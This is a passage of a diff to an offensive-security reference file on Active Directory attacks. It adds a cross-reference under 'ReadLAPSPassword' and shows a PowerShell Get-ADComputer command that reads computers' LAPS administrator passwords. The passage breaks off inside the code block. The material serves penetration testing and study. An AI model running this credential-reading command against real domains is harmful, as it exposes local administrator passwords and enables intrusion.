swisskyrepo/PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md

 #### ReadLAPSPassword

 An attacker can read the LAPS password of the computer account this ACE applies to.
 This can be achieved with the Active Directory PowerShell module.
+Detail of the exploitation can be found in the [Reading LAPS Password](#reading-laps-password) section.

 ```powershell
 Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'